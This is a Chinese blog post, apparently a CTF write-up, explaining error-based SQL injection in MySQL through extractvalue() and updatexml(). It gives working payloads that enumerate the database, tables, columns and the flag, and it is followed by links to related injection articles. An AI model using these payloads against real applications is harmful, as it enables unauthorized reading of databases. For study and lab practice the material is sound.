SQL报错注入1

最新推荐文章于 2024-07-06 09:27:14 发布
最新推荐文章于 2024-07-06 09:27:14 发布
阅读量300 收藏
点赞数 1
分类专栏: ctf 文章标签: mysql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/125064860
版权

当输入语句出现错误时,会将相应错误输出到前端。SQL报错注入是基于这个条件进行。

常用报错函数:updatexml(),extractvalue(),floor(),exp()

其中extractvalue()用法是

extractvalue(xml_str,Xpath),是从xml中查询Xpath格式的字符串,并返回结果

但是,Xpath不能是结合~或#的字符串,否则会报错,报错会将整个错误的整个字符串都回显出来,因此可以利用报错回显找到想要的信息(xml_str可以随意填写),比如,ctfhub这题CTFHub

输入:

1 and extractvalue(1,concat(0x7e,database()))#

得到当前所属数据库为sqli

再查找当前数据库中包含的表格:

1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli')))#

得到结果

 可知sqli数据库中,除了表news,还有表flag,

查找表中字段:

1 and extractvalue(2,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag')))#

得到:

 可知表格flag中只有字段flag

于是输入:
 

1 and extractvalue(1,concat(0x7e,(select flag from flag)))#

得到结果:

 要注意的是,xpath回显上限32位

对于updatexml()函数,其格式是updatexml(xml,Xpath,news),是查找并替换xml文档中Xpath格式的字符串为news格式,其中Xpath的利用与extractvalue类似,因此注入方法只是多了一个可以内容随意的news的输入,例如对于以上题目,输入:

1 and updatexml(1,concat(0x7e,(select flag from flag)),1)#

就能得到结果:

 

榴莲 蛋挞
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序,当用户输入的数据被错误地用于构造数据库查询,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
ctfhub-sql注入-字符型注入
m0_62094846的博客
11-12 675
说明输入1不能给我们有用的信息,但输入1'会显示错误 查询字符型注入,可以输入1"试试 没有报错(不过好像目前没什么用,确定字段数用1’也一样),记得一定一定加#,不然没用 有2个字段数 确定回显位 语句只能放在第二个位上 查找数据库 猜测在sqli里 查找表 查找字段 ...
sql注入(字符型dvwa low)
qq_54553731的博客
03-24 3229
sql注入
太原理工大学软件学院信息安全方向软件安全技术重点
Ruanjiancaiji的博客
06-20 6796
19级软件安全技术R
太原理工大学——软件安全技术(陈波)考试复习
qq_53272273的博客
05-29 2897
【代码】太原理工大学——软件安全技术(陈波)考试复习。
SQL报错注入
陈艺秋的博客
01-18 308
sql
SQL注入报错注入
2301_80661529的博客
02-22 1310
然而,当XPath表达式构造不当,例如包含了非法字符或者尝试执行一个无法解析为有效XPath表达式的字符串,函数会抛出错误,并且错误信息可能包含有关查询的信息,这便为报错注入提供了机会。floor()报错注入的原因是group by在向临表插入数据,由于rand()多次计算导致插入临主键重复,从而报错,又因为报错前concat()SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。这个表名可能不存在,服务器会抛出一个错误消息,可能揭示表是否存在的信息
SQL注入报错注入
qq_68163788的博客
01-27 1799
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入注入恶意的SQL代码来触发数据库错误,并从错误消息获取有关数据库信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库
sql注入报错注入
2302_79119987的博客
04-19 1064
实行注入的地方。
sql 报错注入
travelnight的博客
03-15 4063
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
32-32.渗透测试SQL注入基于报错注入(上)
05-10
32-32.渗透测试SQL注入基于报错注入(上)
SQL注入-报错注入
m0_53820621的博客
08-15 991
SQL注入-报错注入
Flink CDC MySQL同步MySQL错误记录
eagle89的专栏
07-02 382
Flink CDC MySQL同步MySQL错误记录
MySql 默认的四个数据库,以及相关的表和查询语句
yuiezt的专栏
07-03 330
MySQL数据库安装完成后,会包含一些默认的系统表,这些表主要用于存储数据库系统的元数据、权限、用户信息等。
Fastapi 项目第二天首次访问数据库连接报错问题Can‘t connect to MySQL server
最新发布
qq_27371025的博客
07-06 246
Fastapi 项目使用 sqlalchemy 连接的mysql 数据库,每次第二天首次访问数据库相关操作,都会报错sqlalchemy.exc.OperationalError: (pymysql.err.OperationalError) (2003, “Can’t connect to MySQL server on ‘x.x.x.x’ ([Errno 111] Connection refused)”)
sql报错注入读取文件
05-22
SQL注入攻击是最常见的网络攻击之一,攻击者通过构造恶意的SQL查询语句,使得数据库执行该查询语句,并将查询结果返回给攻击者。而报错注入是一种常见的注入攻击技术,攻击者在构造SQL查询语句,故意使用一些错误的语法或者参数,从而导致数据库执行错误,返回错误信息。 如果攻击者成功利用报错注入技术读取了数据库的敏感信息,比如用户名、密码等,那么他们可能会进一步尝试读取服务器上的其他文件,比如配置文件、授权文件等。为了防止这种攻击,应该加强对应用程序的输入参数检查和过滤,使用安全的编程技术和框架,避免使用动态SQL语句等不安全的编码方式。此外,及更新数据库软件补丁和安全设置也是非常必要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值